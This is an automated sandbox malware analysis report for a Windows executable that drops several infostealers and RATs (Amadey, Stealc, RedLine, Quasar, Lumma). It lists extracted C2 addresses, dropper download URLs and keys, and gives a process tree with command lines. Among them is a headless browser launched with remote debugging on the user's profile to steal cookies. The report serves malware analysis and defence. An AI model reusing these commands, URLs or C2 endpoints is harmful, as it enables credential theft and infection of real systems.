Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

b3fdbd0e34...44.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250211-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/02/2025, 22:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe

  • Size

    5.5MB

  • MD5

    be5397f3b0bde8d16067fdccff9cc387

  • SHA1

    904f4ac82cb0748bd6416196d58c87c06eac1fec

  • SHA256

    b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944

  • SHA512

    076ca3fc19706d8a701ee43805f65c2e81acdfcbb6eb35445cdb8fd6a2d8e81aecc35446d7124de3b286a1cce76b43b589ea84eb093c3fe17eecc792c2cebd6b

  • SSDEEP

    98304:l2DztHRUIE0Orvb60fnOpmcP3WLJwAQo8MUgKAT9jsaFTL:oDztH6IcrzjxcfWLSQXvxBsa

Score
10/10
amadeyasyncrathealerlummaquasarredlinerhadamanthyssectopratstealcstormkittyvenomratvidar9c9aa5cheatfed3aagithubytrenobootkitcredential_accessdefense_evasiondiscoverydropperevasionexecutioninfostealerpersistenceprivilege_escalationpyinstallerratspywarestealertrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.214.142.152:26264

Extracted

Family

quasar

Version

1.4.1

Botnet

githubyt

C2

87.228.57.81:4782

Mutex

cf3988ab-2fd9-4544-a16f-9faa71eb5bac

Attributes
  • encryption_key

    19A0FAF8459F69650B5965C225752D425C429EEC

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchoost.exe

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://timnelessdesign.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Vidar Stealer 1 IoCs
    stealer
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects Rhadamanthys payload 1 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Rhadamanthys family
    rhadamanthys
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • VenomRAT 1 IoCs

    Detects VenomRAT.

    rat
  • Venomrat family
    venomrat
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
    defense_evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs
    defense_evasion
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 25 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    defense_evasion
  • Uses browser remote debugging 2 TTPs 19 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 4 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 46 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 51 IoCs
  • Identifies Wine through registry keys 2 TTPs 23 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 50 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 16 IoCs
  • Kills process with taskkill 3 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2620
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:5164
    • C:\Users\Admin\AppData\Local\Temp\b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe
      "C:\Users\Admin\AppData\Local\Temp\b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe"
      1⤵
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\t3k24.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\t3k24.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k77o9.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k77o9.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5052
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:116
            • C:\Users\Admin\AppData\Local\Temp\1075597001\BwStzYG.exe
              "C:\Users\Admin\AppData\Local\Temp\1075597001\BwStzYG.exe"
              5⤵
              • Executes dropped EXE
              PID:3968
            • C:\Users\Admin\AppData\Local\Temp\1075681001\Ubrlj6S.exe
              "C:\Users\Admin\AppData\Local\Temp\1075681001\Ubrlj6S.exe"
              5⤵
              • Executes dropped EXE
              • Enumerates connected drives
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1100
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:2936
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:1888
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4088
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4256
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:3844
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4652
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4304
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:908
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4880
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:2160
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:3520
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:2548
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:3588
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:3540
              • C:\Windows\system32\tasklist.exe
                "tasklist"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4920
              • C:\Windows\system32\tasklist.exe
                "tasklist" /FO CSV /NH
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:316
              • C:\Windows\system32\taskkill.exe
                "taskkill" /F /IM discord.exe
                6⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2884
              • C:\Windows\system32\tasklist.exe
                "tasklist" /FI "IMAGENAME eq chrome.exe"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:3068
              • C:\Windows\system32\tasklist.exe
                "tasklist" /FI "IMAGENAME eq msedge.exe"
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4460
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=8368 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --start-minimized
                6⤵
                • Uses browser remote debugging
                • Suspicious use of AdjustPrivilegeToken
                PID:3432
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa5d53cc40,0x7ffa5d53cc4c,0x7ffa5d53cc58
                  7⤵
                    PID:5116
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1464,i,8811328887332689222,5234106313082540570,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1456 /prefetch:2
                    7⤵
                      PID:2956
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1752,i,8811328887332689222,5234106313082540570,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1748 /prefetch:3
                      7⤵
                        PID:1628
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=8812 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --start-minimized
                      6⤵
                      • Uses browser remote debugging
                      PID:768
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffa5cdd46f8,0x7ffa5cdd4708,0x7ffa5cdd4718
                        7⤵
                          PID:1064
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1504,5435927330579444902,3344945548068419828,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1548 /prefetch:2
                          7⤵
                            PID:3512
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,5435927330579444902,3344945548068419828,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1880 /prefetch:3
                            7⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1432
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8812 --allow-pre-commit-input --field-trial-handle=1504,5435927330579444902,3344945548068419828,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2080 /prefetch:1
                            7⤵
                            • Uses browser remote debugging
                            PID:3428
                        • C:\Windows\system32\tasklist.exe
                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4460
                        • C:\Windows\system32\taskkill.exe
                          "taskkill" /F /IM msedge.exe
                          6⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3256
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2392
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2080
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2832
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4440
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2884
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1960
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4296
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1964
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1104
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1624
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2708
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4332
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3520
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2984
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2544
                        • C:\Windows\system32\hostname.exe
                          "hostname"
                          6⤵
                            PID:2324
                          • C:\Windows\System32\Wbem\wmic.exe
                            "wmic" path win32_VideoController get name /value
                            6⤵
                            • Detects videocard installed
                            PID:3504
                          • C:\Windows\system32\getmac.exe
                            "getmac" /fo list /v
                            6⤵
                              PID:1844
                            • C:\Windows\system32\netsh.exe
                              "netsh" advfirewall show allprofiles state
                              6⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:1768
                          • C:\Users\Admin\AppData\Local\Temp\1075826001\amnew.exe
                            "C:\Users\Admin\AppData\Local\Temp\1075826001\amnew.exe"
                            5⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3256
                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                              "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:5044
                              • C:\Users\Admin\AppData\Local\Temp\10001140101\b73d826715.exe
                                "C:\Users\Admin\AppData\Local\Temp\10001140101\b73d826715.exe"
                                7⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1584
                              • C:\Users\Admin\AppData\Local\Temp\10001170101\crypted.exe
                                "C:\Users\Admin\AppData\Local\Temp\10001170101\crypted.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3764
                                • C:\Users\Admin\AppData\Local\Temp\10001170101\crypted.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001170101\crypted.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:4324
                                • C:\Users\Admin\AppData\Local\Temp\10001170101\crypted.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001170101\crypted.exe"
                                  8⤵
                                  • Downloads MZ/PE file
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5084
                                  • C:\Users\Admin\AppData\Local\Temp\O4JFMA4CHTEAP4C8JCVFB.exe
                                    "C:\Users\Admin\AppData\Local\Temp\O4JFMA4CHTEAP4C8JCVFB.exe"
                                    9⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of FindShellTrayWindow
                                    PID:316
                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                      10⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Downloads MZ/PE file
                                      • Checks BIOS information in registry
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Adds Run key to start application
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      PID:5420
                                      • C:\Users\Admin\AppData\Local\Temp\1019932001\739705b376.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1019932001\739705b376.exe"
                                        11⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        PID:428
                                      • C:\Users\Admin\AppData\Local\Temp\1019933001\2afb84848a.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1019933001\2afb84848a.exe"
                                        11⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        PID:5272
                                      • C:\Users\Admin\AppData\Local\Temp\1019934001\3dbbe407e4.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1019934001\3dbbe407e4.exe"
                                        11⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:5160
                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                          12⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:324
                                      • C:\Users\Admin\AppData\Local\Temp\1019935001\4b0d046721.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1019935001\4b0d046721.exe"
                                        11⤵
                                        • Enumerates VirtualBox registry keys
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Checks processor information in registry
                                        PID:2084
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1520
                                    9⤵
                                    • Program crash
                                    PID:5308
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 928
                                  8⤵
                                  • Program crash
                                  PID:3692
                              • C:\Users\Admin\AppData\Local\Temp\10001180101\alex111111.exe
                                "C:\Users\Admin\AppData\Local\Temp\10001180101\alex111111.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:4324
                                • C:\Users\Admin\AppData\Local\Temp\10001180101\alex111111.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001180101\alex111111.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4596
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 960
                                  8⤵
                                  • Program crash
